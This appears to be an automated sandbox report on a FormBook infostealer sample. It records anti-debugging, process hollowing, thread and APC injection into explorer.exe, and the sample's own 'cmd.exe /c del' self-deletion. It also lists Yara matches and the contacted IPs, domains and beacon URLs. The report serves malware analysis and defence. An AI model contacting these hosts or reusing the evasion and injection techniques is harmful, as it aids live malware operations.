Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CEA55 mov eax, dword ptr fs:[00000030h] 6_2_046CEA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04694257 mov eax, dword ptr fs:[00000030h] 6_2_04694257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h] 6_2_04644A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h] 6_2_04644A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04618A0A mov eax, dword ptr fs:[00000030h] 6_2_04618A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov ecx, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460AA16 mov eax, dword ptr fs:[00000030h] 6_2_0460AA16
Enables debug privileges
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.borderlesstrade.info
Source: C:\Windows\explorer.exe Domain query: www.swashbug.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe Network Connect: 185.253.212.22 80
Source: C:\Windows\explorer.exe Domain query: www.hispekdiamond.com
Source: C:\Windows\explorer.exe Domain query: www.bl927.com
Source: C:\Windows\explorer.exe Domain query: www.7chd.com
Source: C:\Windows\explorer.exe Network Connect: 52.15.160.167 80
Source: C:\Windows\explorer.exe Network Connect: 213.171.195.105 80
Source: C:\Windows\explorer.exe Domain query: www.zagorafinancial.com
Source: C:\Windows\explorer.exe Network Connect: 45.142.156.44 80
Source: C:\Windows\explorer.exe Network Connect: 162.209.114.201 80
Source: C:\Windows\explorer.exe Domain query: www.montcoimmigrationlawyer.com
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.72 80
Source: C:\Windows\explorer.exe Domain query: www.mojilifenoosa.com
Source: C:\Windows\explorer.exe Domain query: www.3992199.com
Source: C:\Windows\explorer.exe Domain query: www.fibermover.com
Source: C:\Windows\explorer.exe Domain query: www.funnyfootballmugs.com
Source: C:\Windows\explorer.exe Domain query: www.przyczepy.net
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 169.1.24.244 80
Source: C:\Windows\explorer.exe Domain query: www.cdefenders.com
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect, 0_2_740D1000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Users\user\Desktop\NdBLyH2h5d.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 300000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: explorer.exe, 00000004.00000002.478596652.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Behavior Graph (ID: 385309, Sample: NdBLyH2h5d.exe, Startdate: 12/04/2021, Architecture: WINDOWS, Score: 100)

Sample-level DNS/IP info: www.plaisterpress.com, www.missjeschickt.com, missjeschickt.com
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

Process tree:
  • NdBLyH2h5d.exe 18 (started)
    DNS/IP: 192.168.2.1 unknown unknown
    Dropped file: C:\Users\user\AppData\...\6oxdti6l9qd.dll, PE32
    Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
    • NdBLyH2h5d.exe (started by the parent NdBLyH2h5d.exe)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      • explorer.exe (injected)
        DNS/IP: missjeschickt.com 81.169.145.72, 49734, 80 STRATOSTRATOAGDE Germany; zagorafinancial.com 162.209.114.201, 49723, 80 RACKSPACEUS United States; 20 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        • rundll32.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe 1 (started)
            • conhost.exe (started)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
45.142.156.44 | k9cdna.51w4.com | United Kingdom | 40065 | CNSERVERSUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
184.168.131.241 | montcoimmigrationlawyer.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
162.209.114.201 | zagorafinancial.com | United States | 27357 | RACKSPACEUS | true
185.253.212.22 | www.przyczepy.net | Poland | 48707 | GREENER-ASPL | true
81.169.145.72 | missjeschickt.com | Germany | 6724 | STRATOSTRATOAGDE | true
34.102.136.180 | fibermover.com | United States | 15169 | GOOGLEUS | false
169.1.24.244 | www.swashbug.com | South Africa | 37611 | AfrihostZA | true
52.15.160.167 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
213.171.195.105 | www.hispekdiamond.com | United Kingdom | 8560 | ONEANDONE-ASBrauerstrasse48DE | true

Private

IP
192.168.2.1

Contacted Domains

Name | IP | Active
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 52.15.160.167 | true
montcoimmigrationlawyer.com | 184.168.131.241 | true
missjeschickt.com | 81.169.145.72 | true
www.przyczepy.net | 185.253.212.22 | true
k9cdna.51w4.com | 45.142.156.44 | true
www.swashbug.com | 169.1.24.244 | true
mojilifenoosa.com | 184.168.131.241 | true
zagorafinancial.com | 162.209.114.201 | true
shops.myshopify.com | 23.227.38.74 | true
fibermover.com | 34.102.136.180 | true
www.hispekdiamond.com | 213.171.195.105 | true
www.plaisterpress.com | 104.21.24.135 | true
www.borderlesstrade.info | unknown | unknown
www.bl927.com | unknown | unknown
www.montcoimmigrationlawyer.com | unknown | unknown
www.mojilifenoosa.com | unknown | unknown
www.missjeschickt.com | unknown | unknown
www.3992199.com | unknown | unknown
www.fibermover.com | unknown | unknown
www.funnyfootballmugs.com | unknown | unknown
www.7chd.com | unknown | unknown
www.cdefenders.com | unknown | unknown
www.zagorafinancial.com | unknown | unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp false
  • Avira URL Cloud: safe
unknown
http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: malware
unknown
http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown
http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown
http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown
http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown
www.montcoimmigrationlawyer.com/uoe8/ true
  • Avira URL Cloud: safe
low
http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown
http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown
http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown
http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
unknown